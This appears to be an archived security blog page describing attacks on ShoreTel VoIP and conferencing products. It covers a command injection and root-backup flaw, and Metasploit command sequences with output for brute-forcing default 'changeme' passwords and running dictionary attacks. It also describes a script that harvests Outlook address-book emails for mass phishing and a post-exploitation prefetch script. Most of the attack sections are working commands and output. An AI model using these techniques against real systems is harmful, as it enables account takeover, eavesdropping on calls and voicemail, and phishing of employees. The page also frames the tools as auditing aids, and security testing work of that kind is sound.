Archive
Hacking Shoretel Converged Conferencing Bridge
This metasploit module was made with the help of Josh @savant42 for #thotcon
The methodology of this hack comes entirely from Josh. This metasploit module is made by both of us..
Thumbs up to Josh for coming up with this.
This post is based on Josh’s (@savant42) talk at #thotcon
In Shoretel Converged Conferencing Bridge, Monitoring> System Commands page is vulnerable to command injection
Another problem is that the backup job runs as root
This can be found under Configuration > Manual Server Backup
Based on these 2 vulnerabilities, this metasploit module is born.
A demo video of the metasploit module can be found here http://www.youtube.com/watch?v=SoIhK1HNn7M
The metasploit module can be found here http://pastebin.com/HszVqSNE
Below is a screenshot of the metasploit module in action
Exploiting Shoretel Server
Hacking Shoretel Voip Server
A demo has been uploaded to youtube http://www.youtube.com/watch?v=owkTf8HEBP8
The meterpreter script can be used to audit the user accounts on the Shoretel server. This is written for Shoreware Director Build 14.X
There are 2 ways of accessing shoretel voice services. One via the IP phone and another via soft client (Shoretel Call Manager client)
The default password for Shoretel Call Manager is ‘changeme’ and if a person has never login into Shoretel Cal Manager client before, he/she will not be able to change the password.
What are the complications if you have never change the password for your soft client login?
That means that an intruder will be able to login into your extension using the default password ‘changeme’ and
1. Access Call Logs
2. Make Calls
3. Access Your Voice Mails
4. Eavesdrop on an Extension via Intercom ?
5. Impersonate as another user and send malicious links to another users via the IM feature.
Mitigation Methods
Up to now, I do not know of any options in Shoreware Director to change the default call manager password other than manually editing each account and changing the password.
Enabling AD authentication might be another viable option.
You can download my meterpreter script from http://code.google.com/p/shoretel-brute/ to audit the accounts on your servers which are using the default password.
Bruteforce a user account using default paswords
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set USERNAME test1
msf > set TEST_OPTION 1
msf > run
[*] Shoreware Director Web Console – Testing Default Passwords for User Accounts
[*] 192.168.1.6:5440 – Trying username:’user1′ password:’changeme
‘[-] 192.168.1.6:5440 – Successful login ‘user1′ : ‘changeme’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Bruteforce using password list (Dictionary Attack)
Since the shoretel system have no restrictions on the complexity of the passwords that the users can set for their soft client login and the absence of account lockout policies (for non AD authentication), it is possible to brute force an account.
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set TEST_OPTION 2
msf > set USERNAME user1
msf > run
[*] 192.168.1.6:5440 – Trying username:’user1′ password:’1234′
[-] 192.168.1.6:5440 – Failed to login as ‘user1′ using password ’1234
‘[*] 192.168.1.6:5440 – Trying username:’user1′ password:’12345′
[-] 192.168.1.6:5440 – Successful login ‘user1′ : ’12345′
‘[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
Check which user accounts using default passwords
If you already have access to the target’s computer, you can use the getOAB script I wrote to extract all email addresses from the Outlook Offline Address Book to be used for this test.
Check this blog post for more information http://milo2012.wordpress.com/2011/03/14/new-programmeterpreter-script-getoab-parse-offline-addres-book/
msf > use auxiliary/gather/search_email_collector
msf > set DOMAIN domain.com
msf > set OUTFILE “c:/Program Files/Rapid7/framework/msf3/data/wordlists/shoretel_users.txt”
msf > run
Edit shoretel_users.txt and make sure that a username is in each line
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 1
msf > run
[*] 192.168.1.6:5440 – Trying username:’user1′ password:’changeme’
[-] 192.168.1.6:5440 – Invalid Username ‘user1
‘[*] 192.168.1.6:5440 – Trying username:’user2′ password:’changeme
‘[-] 192.168.1.6:5440 – Successful login ‘user2′ : ‘changeme’
‘[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use Dictionary Attacks Against User Accounts
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS 192.168.1.6
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 2
msf > set PASS_FILE “C:/Program Files/Rapid7/framework/msf3/data/wordlists/dict.txt”
msf > run
New Program/Meterpreter Script – GetOAB (Parse Offline Address Book)
I just wrote this meterpreter script and program that parse the outlook OAB file for email addresses so that the email address list can be used in SET (social engineer toolkit) for mass email attack or be used for VOIP system login bruteforce.
This program is written in C# and has been tested with Office 2010. Please let me know if you face any issues with other versions.
Meterpreter Script for Prefetch-Tool
This is the first meterpreter script I wrote for Metasploit Framework . I have integrated the use of the prefetch-tool via a meterpreter script.
As mentioned in the previous post, the windows prefetch folder contains information about what the frequently used programs are and based on this information, you can actually find out how the computer was used by the user/roles of the computer in the network.
This meterpreter script is not integrated into Metasploit. To use it, please follow the below steps
1. Download the below files
a. PrefetchTool Meterpreter Script
b. Prefetch Tool Executable
2. Copy the prefetchtool.rb file to [<metasploit installation folder>\msf3\scripts\meterpreter] folder
3. Copy prefetch.exe to [<metasploit installation folder>\msf3\data] folder
Check out the demo videos below.
http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx
http://www.youtube.com/watch?v=0z1Nuk-w2AU&fmt=22
If you face any issues or have any cool ideas for new scripts, you can contact me at keith.lee2012[at]gmail.com. (:
Categories
Recent Posts
Twitter Updates
- RT @HITBSecConf: 8 new #HITB2013KUL trainings with 2 courses by @evad3rs conference.hitb.org/hitbsecconf201… #HITB2013KUL cc @pod2g @pimskeks @MuscleNe… 1 week ago
- RT @Dinosn: Common OAuth issue you can use to take over accounts webstersprodigy.net/2013/05/09/com… 1 week ago
- RT @ChrisJohnRiley: [SuggestedReading] Giving your first security conference talk bit.ly/174npFz 1 week ago
- RT @jedisct1: Response Fuzzing: digitalbond.com/blog/2013/05/0… 1 week ago
- RT @ChrisJohnRiley: [SuggestedReading] AV0id – Anti-Virus Bypass Metasploit Payload Generator Script bit.ly/ZEAaiy 2 weeks ago
- RT @mubix: #SharedLinks Quickly Determine Allowed Outbound Ports j.mp/16OdhAx 2 weeks ago
